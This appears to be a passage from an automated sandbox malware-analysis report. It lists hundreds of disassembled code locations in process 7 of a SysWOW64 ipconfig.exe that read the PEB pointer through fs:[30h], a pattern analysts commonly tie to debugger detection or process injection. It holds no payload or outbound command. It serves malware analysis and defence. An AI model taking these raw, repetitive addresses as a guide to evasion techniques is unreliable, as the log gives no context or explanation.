          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E3B7A mov eax, dword ptr fs:[00000030h]7_2_035E3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688B58 mov eax, dword ptr fs:[00000030h]7_2_03688B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BDB60 mov ecx, dword ptr fs:[00000030h]7_2_035BDB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CFF60 mov eax, dword ptr fs:[00000030h]7_2_035CFF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DF716 mov eax, dword ptr fs:[00000030h]7_2_035DF716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA70E mov eax, dword ptr fs:[00000030h]7_2_035EA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA70E mov eax, dword ptr fs:[00000030h]7_2_035EA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368070D mov eax, dword ptr fs:[00000030h]7_2_0368070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368070D mov eax, dword ptr fs:[00000030h]7_2_0368070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EE730 mov eax, dword ptr fs:[00000030h]7_2_035EE730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FF10 mov eax, dword ptr fs:[00000030h]7_2_0364FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FF10 mov eax, dword ptr fs:[00000030h]7_2_0364FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B4F2E mov eax, dword ptr fs:[00000030h]7_2_035B4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B4F2E mov eax, dword ptr fs:[00000030h]7_2_035B4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0367131B mov eax, dword ptr fs:[00000030h]7_2_0367131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036353CA mov eax, dword ptr fs:[00000030h]7_2_036353CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036353CA mov eax, dword ptr fs:[00000030h]7_2_036353CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F37F5 mov eax, dword ptr fs:[00000030h]7_2_035F37F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DDBE9 mov eax, dword ptr fs:[00000030h]7_2_035DDBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]7_2_035E03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C8794 mov eax, dword ptr fs:[00000030h]7_2_035C8794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2397 mov eax, dword ptr fs:[00000030h]7_2_035E2397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03685BA5 mov eax, dword ptr fs:[00000030h]7_2_03685BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EB390 mov eax, dword ptr fs:[00000030h]7_2_035EB390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C1B8F mov eax, dword ptr fs:[00000030h]7_2_035C1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C1B8F mov eax, dword ptr fs:[00000030h]7_2_035C1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366D380 mov ecx, dword ptr fs:[00000030h]7_2_0366D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0367138A mov eax, dword ptr fs:[00000030h]7_2_0367138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]7_2_035E4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]7_2_035E4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]7_2_035E4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]7_2_03637794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]7_2_03637794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]7_2_03637794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366B260 mov eax, dword ptr fs:[00000030h]7_2_0366B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366B260 mov eax, dword ptr fs:[00000030h]7_2_0366B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688A62 mov eax, dword ptr fs:[00000030h]7_2_03688A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]7_2_035B9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]7_2_035B9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]7_2_035B9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]7_2_035B9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]7_2_035C7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F927A mov eax, dword ptr fs:[00000030h]7_2_035F927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]7_2_035DAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]7_2_035DAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]7_2_035DAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]7_2_035DAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]7_2_035DAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C766D mov eax, dword ptr fs:[00000030h]7_2_035C766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03644257 mov eax, dword ptr fs:[00000030h]7_2_03644257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D3A1C mov eax, dword ptr fs:[00000030h]7_2_035D3A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA61C mov eax, dword ptr fs:[00000030h]7_2_035EA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA61C mov eax, dword ptr fs:[00000030h]7_2_035EA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]7_2_035B5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov ecx, dword ptr fs:[00000030h]7_2_035B5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]7_2_035B5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]7_2_035B5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAA16 mov eax, dword ptr fs:[00000030h]7_2_035BAA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAA16 mov eax, dword ptr fs:[00000030h]7_2_035BAA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C8A0A mov eax, dword ptr fs:[00000030h]7_2_035C8A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366FE3F mov eax, dword ptr fs:[00000030h]7_2_0366FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]7_2_035BC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]7_2_035BC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]7_2_035BC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E8E00 mov eax, dword ptr fs:[00000030h]7_2_035E8E00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671608 mov eax, dword ptr fs:[00000030h]7_2_03671608
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F4A2C mov eax, dword ptr fs:[00000030h]7_2_035F4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F4A2C mov eax, dword ptr fs:[00000030h]7_2_035F4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BE620 mov eax, dword ptr fs:[00000030h]7_2_035BE620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E36CC mov eax, dword ptr fs:[00000030h]7_2_035E36CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2ACB mov eax, dword ptr fs:[00000030h]7_2_035E2ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F8EC7 mov eax, dword ptr fs:[00000030h]7_2_035F8EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366FEC0 mov eax, dword ptr fs:[00000030h]7_2_0366FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2AE4 mov eax, dword ptr fs:[00000030h]7_2_035E2AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E16E0 mov ecx, dword ptr fs:[00000030h]7_2_035E16E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688ED6 mov eax, dword ptr fs:[00000030h]7_2_03688ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C76E2 mov eax, dword ptr fs:[00000030h]7_2_035C76E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036346A7 mov eax, dword ptr fs:[00000030h]7_2_036346A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035ED294 mov eax, dword ptr fs:[00000030h]7_2_035ED294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035ED294 mov eax, dword ptr fs:[00000030h]7_2_035ED294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]7_2_03680EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]7_2_03680EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]7_2_03680EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FE87 mov eax, dword ptr fs:[00000030h]7_2_0364FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CAAB0 mov eax, dword ptr fs:[00000030h]7_2_035CAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CAAB0 mov eax, dword ptr fs:[00000030h]7_2_035CAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFAB0 mov eax, dword ptr fs:[00000030h]7_2_035EFAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]7_2_035B52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]7_2_035B52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]7_2_035B52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]7_2_035B52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]7_2_035B52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D7D50 mov eax, dword ptr fs:[00000030h]7_2_035D7D50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DB944 mov eax, dword ptr fs:[00000030h]7_2_035DB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DB944 mov eax, dword ptr fs:[00000030h]7_2_035DB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F3D43 mov eax, dword ptr fs:[00000030h]7_2_035F3D43
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633540 mov eax, dword ptr fs:[00000030h]7_2_03633540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB171 mov eax, dword ptr fs:[00000030h]7_2_035BB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB171 mov eax, dword ptr fs:[00000030h]7_2_035BB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC577 mov eax, dword ptr fs:[00000030h]7_2_035DC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC577 mov eax, dword ptr fs:[00000030h]7_2_035DC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC962 mov eax, dword ptr fs:[00000030h]7_2_035BC962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0363A537 mov eax, dword ptr fs:[00000030h]7_2_0363A537
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]7_2_035B9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]7_2_035B9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]7_2_035B9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688D34 mov eax, dword ptr fs:[00000030h]7_2_03688D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E513A mov eax, dword ptr fs:[00000030h]7_2_035E513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E513A mov eax, dword ptr fs:[00000030h]7_2_035E513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]7_2_035E4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]7_2_035E4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]7_2_035E4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAD30 mov eax, dword ptr fs:[00000030h]7_2_035BAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov ecx, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036441E8 mov eax, dword ptr fs:[00000030h]7_2_036441E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03668DF1 mov eax, dword ptr fs:[00000030h]7_2_03668DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov ecx, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]7_2_036805AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]7_2_036805AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]7_2_035EFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]7_2_035EFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036369A6 mov eax, dword ptr fs:[00000030h]7_2_036369A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2990 mov eax, dword ptr fs:[00000030h]7_2_035E2990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA185 mov eax, dword ptr fs:[00000030h]7_2_035EA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC182 mov eax, dword ptr fs:[00000030h]7_2_035DC182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]7_2_035E61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]7_2_035E61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E35A1 mov eax, dword ptr fs:[00000030h]7_2_035E35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]7_2_035D0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]7_2_035D0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03672073 mov eax, dword ptr fs:[00000030h]7_2_03672073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA44B mov eax, dword ptr fs:[00000030h]7_2_035EA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681074 mov eax, dword ptr fs:[00000030h]7_2_03681074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D746D mov eax, dword ptr fs:[00000030h]7_2_035D746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]7_2_0364C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]7_2_0364C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EBC2C mov eax, dword ptr fs:[00000030h]7_2_035EBC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
